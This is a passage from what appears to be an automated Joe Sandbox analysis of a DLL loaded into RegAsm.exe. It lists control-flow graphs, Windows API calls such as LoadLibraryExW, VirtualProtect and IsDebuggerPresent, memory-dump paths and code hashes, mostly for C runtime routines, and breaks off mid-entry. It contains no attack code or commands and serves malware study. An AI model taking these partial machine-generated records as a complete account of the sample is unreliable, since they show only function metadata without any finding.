                                                                                                                                                                                                control_flow_graph 147 10005ce1-10005cf5 148 10005d02-10005d1d LoadLibraryExW 147->148 149 10005cf7-10005d00 147->149 151 10005d46-10005d4c 148->151 152 10005d1f-10005d28 GetLastError 148->152 150 10005d59-10005d5b 149->150 155 10005d55 151->155 156 10005d4e-10005d4f FreeLibrary 151->156 153 10005d37 152->153 154 10005d2a-10005d35 LoadLibraryExW 152->154 157 10005d39-10005d3b 153->157 154->157 158 10005d57-10005d58 155->158 156->155 157->151 159 10005d3d-10005d44 157->159 158->150 159->158
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 160 1000c7a7-1000c7bc 161 1000c82d 160->161 162 1000c7be-1000c7c6 160->162 164 1000c82f-1000c833 161->164 162->161 163 1000c7c8-1000c7f6 call 1000c7e6 162->163 172 1000c7f8 163->172 173 1000c86c-1000c86e 163->173 165 1000c872 call 1000c877 164->165 166 1000c835-1000c83d GetModuleHandleA 164->166 169 1000c83f-1000c847 166->169 169->169 171 1000c849-1000c84c 169->171 171->164 174 1000c84e-1000c850 171->174 177 1000c7fa-1000c7fe 172->177 178 1000c85b-1000c85e 172->178 175 1000c870 173->175 176 1000c866-1000c86b 173->176 179 1000c852-1000c854 174->179 180 1000c856-1000c85a 174->180 175->171 176->173 184 1000c800 177->184 185 1000c865 177->185 181 1000c85f-1000c860 call 1000c897 178->181 179->181 180->178 181->185 186 1000c809-1000c80b 184->186 187 1000c804 call 1000c897 184->187 185->176 186->161 188 1000c80d-1000c81a VirtualProtect 186->188 187->186 189 1000c82c 188->189 190 1000c81c-1000c82a VirtualProtect 188->190 189->161 190->189
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2905821283-0
                                                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 191 1000c803-1000c80b call 1000c897 194 1000c82d 191->194 195 1000c80d-1000c81a VirtualProtect 191->195 198 1000c82f-1000c833 194->198 196 1000c82c 195->196 197 1000c81c-1000c82a VirtualProtect 195->197 196->194 197->196 199 1000c872 call 1000c877 198->199 200 1000c835-1000c83d GetModuleHandleA 198->200 202 1000c83f-1000c847 200->202 202->202 203 1000c849-1000c84c 202->203 203->198 204 1000c84e-1000c850 203->204 205 1000c852-1000c854 204->205 206 1000c856-1000c85e 204->206 207 1000c85f-1000c865 call 1000c897 205->207 206->207 211 1000c866-1000c86e 207->211 213 1000c870 211->213 213->203
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual$HandleModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3519776433-0
                                                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 214 10006acb-10006aff GetCPInfo 215 10006bf5-10006c02 214->215 216 10006b05 214->216 218 10006c08-10006c18 215->218 217 10006b07-10006b11 216->217 217->217 219 10006b13-10006b26 217->219 220 10006c24-10006c2b 218->220 221 10006c1a-10006c22 218->221 224 10006b47-10006b49 219->224 222 10006c3b 220->222 223 10006c2d-10006c34 220->223 225 10006c37-10006c39 221->225 226 10006c3d-10006c4c 222->226 223->225 227 10006b28-10006b2f 224->227 228 10006b4b-10006b82 call 100086e4 call 10008a3e 224->228 225->226 226->218 229 10006c4e-10006c5e call 10002ada 226->229 230 10006b3e-10006b40 227->230 239 10006b87-10006bb2 call 10008a3e 228->239 233 10006b31-10006b33 230->233 234 10006b42-10006b45 230->234 233->234 238 10006b35-10006b3d 233->238 234->224 238->230 242 10006bb4-10006bbe 239->242 243 10006bc0-10006bcc 242->243 244 10006bce-10006bd0 242->244 245 10006bde-10006be5 243->245 246 10006bd2-10006bd7 244->246 247 10006be7 244->247 248 10006bee-10006bf1 245->248 246->245 247->248 248->242 249 10006bf3 248->249 249->229
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Info
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                                                                                                • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 250 10005f19-10005f3b call 10005c45 252 10005f40-10005f47 250->252 253 10005f70-10005f8a call 10005fa1 LCMapStringW 252->253 254 10005f49-10005f6e 252->254 258 10005f90-10005f9e call 10002ada 253->258 254->258
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String
                                                                                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                                                                                                • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 262 10005d5c-10005d7e call 10005c45 264 10005d83-10005d8a 262->264 265 10005d9b TlsAlloc 264->265 266 10005d8c-10005d99 264->266 267 10005da1-10005daf call 10002ada 265->267 266->267
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Alloc
                                                                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                                                                • API String ID: 2773662609-671089009
                                                                                                                                                                                                • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 272 10003af1-10003b06 call 10003a82 274 10003b0b-10003b12 272->274 275 10003b24-10003b26 TlsAlloc 274->275 276 10003b14-10003b23 274->276
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: try_get_function
                                                                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                                                                • API String ID: 2742660187-671089009
                                                                                                                                                                                                • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                                • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                                                                                • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 279 10006e20-10006e44 call 100069f3 282 10006e54-10006e5b 279->282 283 10006e46-10006e4f call 10006a66 279->283 285 10006e5e-10006e64 282->285 290 10007001-10007010 call 10002ada 283->290 287 10006f54-10006f73 call 10002c40 285->287 288 10006e6a-10006e76 285->288 297 10006f76-10006f7b 287->297 288->285 291 10006e78-10006e7e 288->291 294 10006e84-10006e8a 291->294 295 10006f4c-10006f4f 291->295 294->295 299 10006e90-10006e9c IsValidCodePage 294->299 296 10007000 295->296 296->290 300 10006fb2-10006fbc 297->300 301 10006f7d-10006f82 297->301 299->295 302 10006ea2-10006eaf GetCPInfo 299->302 300->297 307 10006fbe-10006fe5 call 100069b5 300->307 303 10006f84-10006f8a 301->303 304 10006faf 301->304 305 10006eb5-10006ed6 call 10002c40 302->305 306 10006f39-10006f3f 302->306 308 10006fa3-10006fa5 303->308 304->300 319 10006ed8-10006edf 305->319 320 10006f29 305->320 306->295 310 10006f41-10006f47 call 10006a66 306->310 317 10006fe6-10006ff5 307->317 312 10006fa7-10006fad 308->312 313 10006f8c-10006f92 308->313 324 10006ffd-10006ffe 310->324 312->301 312->304 313->312 318 10006f94-10006f9f 313->318 317->317 325 10006ff7-10006ff8 call 10006acb 317->325 318->308 322 10006ee1-10006ee6 319->322 323 10006f02-10006f05 319->323 326 10006f2c-10006f34 320->326 322->323 327 10006ee8-10006eee 322->327 329 10006f0a-10006f11 323->329 324->296 325->324 326->325 330 10006ef6-10006ef8 327->330 329->329 331 10006f13-10006f27 call 100069b5 329->331 332 10006ef0-10006ef5 330->332 333 10006efa-10006f00 330->333 331->326 332->330 333->322 333->323
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                                                                • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                                • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 336 10006c5f-10006c89 call 10005af6 call 10006d7e call 100069f3 343 10006c8b-10006c8d 336->343 344 10006c8f-10006ca4 call 100056d0 336->344 345 10006ce2-10006ce5 343->345 348 10006cd4 344->348 349 10006ca6-10006cbc call 10006e20 344->349 351 10006cd6-10006ce1 call 1000571e 348->351 352 10006cc1-10006cc7 349->352 351->345 354 10006ce6-10006cea 352->354 355 10006cc9-10006cce call 10006368 352->355 357 10006cf1-10006cfc 354->357 358 10006cec call 10007bbc 354->358 355->348 361 10006d13-10006d2d 357->361 362 10006cfe-10006d08 357->362 358->357 361->351 365 10006d2f-10006d36 361->365 362->361 364 10006d0a-10006d12 call 1000571e 362->364 364->361 365->351 367 10006d38-10006d4f call 100068c9 365->367 367->351 371 10006d51-10006d5b 367->371 371->351
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                                                • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2991157371-0
                                                                                                                                                                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 372 10001eec-10001ef5 373 10001ef7-10001efa 372->373 374 10001f2a-10001f35 dllmain_crt_process_detach 372->374 376 10001f1c-10001f28 dllmain_crt_process_attach 373->376 377 10001efc-10001eff 373->377 375 10001f3a 374->375 378 10001f3b-10001f3c 375->378 376->375 379 10001f01-10001f04 377->379 380 10001f12 call 100023ec 377->380 382 10001f06-10001f09 379->382 383 10001f0b-10001f10 call 1000240b 379->383 385 10001f17-10001f1a 380->385 382->378 383->385 385->378
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3750050125-0
                                                                                                                                                                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 387 100038e8-100038ed call 10003af1 389 100038f2-100038fb 387->389 390 10003900-1000390f call 10003ba2 389->390 391 100038fd-100038ff 389->391 394 10003911-10003916 call 1000391b 390->394 395 10003918-1000391a 390->395 394->391
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 806969131-0
                                                                                                                                                                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __crt_fast_encode_pointer
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3768137683-0
                                                                                                                                                                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
